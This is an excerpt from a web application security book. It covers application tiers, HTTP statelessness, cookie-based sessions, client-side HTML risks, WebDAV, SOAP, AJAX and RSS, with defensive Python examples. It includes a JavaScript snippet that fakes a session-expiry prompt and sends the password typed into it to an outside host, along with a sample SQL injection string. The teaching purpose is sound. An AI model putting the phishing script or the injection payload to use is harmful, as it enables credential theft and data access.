Resources | HACKING EXPOSED WEB APPLICATIONS, 3rd Edition

Typically, the ultimate goal of the attacker is to gain unauthorized access to web application resources. What kinds of resources do web applications hold?

Although they can have many layers (often called "tiers"), most web applications have three: presentation, logic, and data. Presentation is usually a Hypertext Markup Language (HTML) page, either static or dynamically generated by scripts. These pages don't usually contain information of use to attackers (at least not intentionally; we'll see several exceptions to this rule throughout this book). The same could be said of the logic layer, although web application developers often make mistakes at this tier that lead to compromise of other aspects of the application. At the data tier sits the juicy information, such as customer data, credit card numbers, and so on.

How do these tiers map to the URI? The presentation layer usually consists of static HTML files or scripts that actively generate HTML. For example:

http://server/file.html (a static HTML file)
http://server/script.php (a PHP: Hypertext Preprocessor, or PHP, script)
http://server/script.asp (a Microsoft Active Server Pages, or ASP, script)
http://server/script.aspx (a Microsoft ASP.NET script)

Dynamic scripts can also act as the logic layer, receiving input parameters and values. For example:

http://server/script.php?input1=foo&input2=bar
http://server/script.aspx?date=friday&time=1745

Many applications use separate executables for this purpose, so instead of script files you may see something like this:

http://server/app?input1=foo&input2=bar
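To make the mapping concrete, here is a minimal Python sketch that splits the example URIs above into the resource being requested and the inputs handed to the logic tier. The helper name describe_uri is ours, introduced only for illustration; the parsing relies on Python's standard urllib.parse module.

```python
from urllib.parse import urlsplit, parse_qs


def describe_uri(uri: str) -> dict:
    """Split a URI into the server, the resource, and the input parameters."""
    parts = urlsplit(uri)
    return {
        "server": parts.netloc,            # host the request is sent to
        "resource": parts.path,            # static file, script, or executable
        "inputs": parse_qs(parts.query),   # parameter name -> list of values
    }


# The example URIs from the text above.
for uri in (
    "http://server/file.html",
    "http://server/script.php?input1=foo&input2=bar",
    "http://server/app?input1=foo&input2=bar",
):
    print(describe_uri(uri))
```

Everything in the "inputs" dictionary is chosen by the client, which is why the query string is such a natural place for an attacker to start probing.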

There are many frameworks for developing tier-2 logic applications like this. Some of the most common include Microsoft's Internet Server Application Programming Interface (ISAPI) and the public Common Gateway Interface (CGI) specification.

Whatever type of tier-2 logic is implemented, it almost invariably needs to access the data in tier 3. Thus, tier 3 is typically a database of some sort, usually a SQL variant. This creates a whole separate opportunity for attackers to manipulate and extract data from the application, as SQL has its own syntax that is often exposed in inappropriate ways via the presentation and logic layers. This will be graphically illustrated in Chapter 7 on web datastores.
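As a rough illustration of how SQL syntax can leak through the logic tier, the following Python sketch uses an in-memory SQLite database. The table, the sample rows, and the function names lookup_unsafe and lookup_safe are all invented for this example; it is a sketch of the general problem, not a description of any particular application.

```python
import sqlite3

# Hypothetical tier-3 datastore with made-up sample rows.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customers (name TEXT, card TEXT)")
conn.executemany(
    "INSERT INTO customers VALUES (?, ?)",
    [("alice", "card-0001"), ("bob", "card-0002")],
)


def lookup_unsafe(name: str) -> list:
    # The input is pasted into the SQL text, so it can change the query itself.
    query = "SELECT name, card FROM customers WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def lookup_safe(name: str) -> list:
    # The input is bound as a parameter and is treated purely as data.
    return conn.execute(
        "SELECT name, card FROM customers WHERE name = ?", (name,)
    ).fetchall()


malicious = "x' OR '1'='1"
print(lookup_unsafe(malicious))  # the WHERE clause is always true: every row comes back
print(lookup_safe(malicious))    # no customer has that literal name: no rows
```

The only difference between the two functions is whether user input is allowed to become part of the SQL statement.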

Authentication, Sessions, And Authorization

HTTP is stateless: no session state is maintained by the protocol itself. That is, if you request a resource and receive a valid response, then request another, the server regards this as a wholly separate and unique request. It does not maintain anything like a session or otherwise attempt to maintain the integrity of a link with the client. This also comes in handy for attackers, as there is no need to plan multistage attacks to emulate intricate session maintenance mechanisms; a single request can bring a web application to its knees.

Even better, web developers have attempted to address this shortcoming of the basic protocol by bolting on their own authentication, session management, and authorization functionality, usually by implementing some form of authentication and then stashing authorization/session information into a cookie. As we'll see in Chapter 4 on authentication, and Chapter 5 on authorization (which also covers session management), this has created fertile ground for attackers to till, over and over again.
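To see why stashing authorization data in a cookie is risky, consider the following Python sketch. The cookie layout, the secret key, and every function name here are hypothetical and chosen only for illustration. It contrasts a server that trusts whatever the cookie says with one that verifies an HMAC tag before believing it.

```python
import hashlib
import hmac

SECRET_KEY = b"server-side-secret"  # hypothetical key, known only to the server


def sign(payload: str) -> str:
    """Compute an HMAC-SHA256 tag over the cookie payload."""
    return hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_cookie(user: str, role: str) -> str:
    """Build a cookie value of the form 'user=...&role=...|tag'."""
    payload = f"user={user}&role={role}"
    return f"{payload}|{sign(payload)}"


def parse_payload(payload: str) -> dict:
    return dict(pair.split("=", 1) for pair in payload.split("&"))


def read_cookie_naive(cookie: str) -> dict:
    # Trusts the client-supplied payload without checking the tag.
    return parse_payload(cookie.split("|", 1)[0])


def read_cookie_checked(cookie: str):
    # Rejects the cookie unless the tag matches the payload.
    payload, _, tag = cookie.partition("|")
    if not hmac.compare_digest(tag, sign(payload)):
        return None
    return parse_payload(payload)


cookie = issue_cookie("alice", "user")
forged = cookie.replace("role=user", "role=admin")  # edited on the client

print(read_cookie_naive(forged))    # the forged role is accepted
print(read_cookie_checked(forged))  # None: the tag no longer matches
print(read_cookie_checked(cookie))  # the untouched cookie still verifies
```

An integrity check like this addresses only tampering; it does nothing about theft or replay of a valid cookie.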

The Web Client And HTML

Following our definition of a web application, a web app client is anything that understands HTTP. The canonical web application client is the web browser. It "speaks" HTTP (among other protocols) and renders HyperText Markup Language (HTML), among other markup languages.

Like HTTP, the web browser is also deceptively simple. Because of the extensibility of HTML and its variants, it is possible to embed a great deal of functionality within seemingly static web content. For example, embedding executable JavaScript in HTML is this simple:

<html>
<script type="text/javascript">
var password = prompt('Your session has expired. Please enter your password to continue.', '');
location.href = "https://10.1.1.1/pass.cgi?passwd=" + password;
</script>
</html>

Copy this text to a file named "test.html" and launch it in your browser to see what this code does. Many other dangerous payloads can be embedded in HTML: besides scripts, ActiveX programs, remote image "web bugs," and arbitrary Cascading Style Sheet (CSS) styles can be used to perform malicious activities on the client, using only humble ASCII as we've just illustrated.

Of course, as many attackers have figured out, simply getting the end user to click a URI can give the attacker complete control of the victim's machine as well. This again demonstrates the power of the URI, but from the perspective of the web client. Don't forget that those innocuous little strings of text are pointers to executable code!

Finally, as we'll describe in the next section, new and powerful technologies like AJAX and RSS are only adding to the complexity of the input that web clients are being asked to parse.

We'll talk more about the implications of all this in Chapter 10.

Other Protocols

HTTP is deceptively simple; it's amazing how much mileage creative people have gotten out of its basic request/response mechanisms. However, it's not always the best solution to problems of application development, and thus still more creative people have wrapped the basic protocol in a diverse array of new dynamic functionality.

One of the most significant additions in recent memory is Web Distributed Authoring and Versioning (WebDAV). WebDAV is defined in RFC 2518 (since obsoleted by RFC 4918), which describes several mechanisms for authoring and managing content on remote web servers. Personally, we don't think this is a good idea, as a protocol that in its default form can write data to a web server leads to nothing but trouble, a theme we'll see time and again in this book. Nevertheless, WebDAV is backed by Microsoft and already exists in their widely deployed products, so a discussion of its security merits is probably moot at this point.

More recently, the notion of XML-based web services has become popular (although some would argue that its popularity is waning already). Although very similar to HTML in its use of tags to define document elements, the eXtensible Markup Language (XML) has evolved to a more behind-the-scenes role, defining the schema and protocols for communications between applications themselves. The Simple Object Access Protocol (SOAP) is an XML-based protocol for messaging and RPC-style communication between web services. We'll talk at length about web services vulnerabilities and countermeasures in Chapter 8.
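For readers who have not seen a SOAP message, the following Python sketch builds and then reads a minimal RPC-style request. The envelope namespace is the standard SOAP 1.1 one; the application namespace, the GetQuote operation, and the Symbol parameter are hypothetical, made up purely to show the shape of a message.

```python
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"  # SOAP 1.1 envelope namespace
APP_NS = "http://example.com/quotes"                   # hypothetical service namespace
NAMESPACES = {"soap": SOAP_NS, "app": APP_NS}


def build_request(symbol: str) -> bytes:
    """Serialize an Envelope/Body/GetQuote/Symbol request."""
    envelope = ET.Element(f"{{{SOAP_NS}}}Envelope")
    body = ET.SubElement(envelope, f"{{{SOAP_NS}}}Body")
    call = ET.SubElement(body, f"{{{APP_NS}}}GetQuote")
    ET.SubElement(call, f"{{{APP_NS}}}Symbol").text = symbol
    return ET.tostring(envelope, encoding="utf-8")


def read_symbol(message: bytes) -> str:
    """Extract the Symbol parameter, as a receiving service might."""
    root = ET.fromstring(message)
    node = root.find("soap:Body/app:GetQuote/app:Symbol", NAMESPACES)
    return node.text


request = build_request("MSFT")
print(request.decode("utf-8"))
print(read_symbol(request))
```

The parameter travels as ordinary text inside the XML document, so the receiving service must treat it with the same suspicion as a query string value.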

Other interesting technologies include AJAX (Asynchronous JavaScript and XML) and RSS (Really Simple Syndication). AJAX is a novel programming approach to web applications that creates the experience of "fat client" applications using lightweight JavaScript and XML technologies. Some have taken to calling AJAX the foundation of "Web 2.0." For a good example of the possibilities here, check out http://www.live.com. We've already noted the potential security issues with executable content on clients, and point again to Chapter 10 for deep coverage.

RSS is a lightweight XML-based mechanism for "feeding" dynamically changing "headlines" between web sites and clients. We'll again cite the example of http://www.live.com, which provides RSS reader "gadgets" that you can embed in your custom homepage to aggregate your favorite RSS feeds in a single place. The security implications of RSS are potentially large: it accepts arbitrary HTML from numerous sources and blindly republishes it. As we saw in our earlier discussion of the dangerous payloads that HTML can carry, this places a much larger aggregate burden on web browsers to behave safely in diverse scenarios.
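The republishing problem can be sketched in a few lines of Python. The feed below is a made-up sample and render_items is a hypothetical helper, not part of any real reader. The sketch assumes the aggregator wants to display feed text only, so it escapes every item before placing it in its own page instead of echoing the markup verbatim.

```python
import html
import xml.etree.ElementTree as ET

# Made-up sample feed whose description carries an embedded script.
FEED = """<rss version="2.0"><channel><title>Example feed</title>
<item><title>Hello</title>
<description>&lt;script&gt;alert('x')&lt;/script&gt;Breaking news</description></item>
</channel></rss>"""


def render_items(feed_xml: str) -> list:
    """Turn feed items into HTML list entries, escaping all feed-supplied text."""
    root = ET.fromstring(feed_xml)
    rendered = []
    for item in root.iter("item"):
        title = item.findtext("title", default="")
        description = item.findtext("description", default="")
        rendered.append(
            f"<li><b>{html.escape(title)}</b>: {html.escape(description)}</li>"
        )
    return rendered


for line in render_items(FEED):
    print(line)
```

Escaping everything is the blunt option; a reader that needs to preserve some formatting would have to filter against an allow-list of tags and attributes, which is considerably harder to get right.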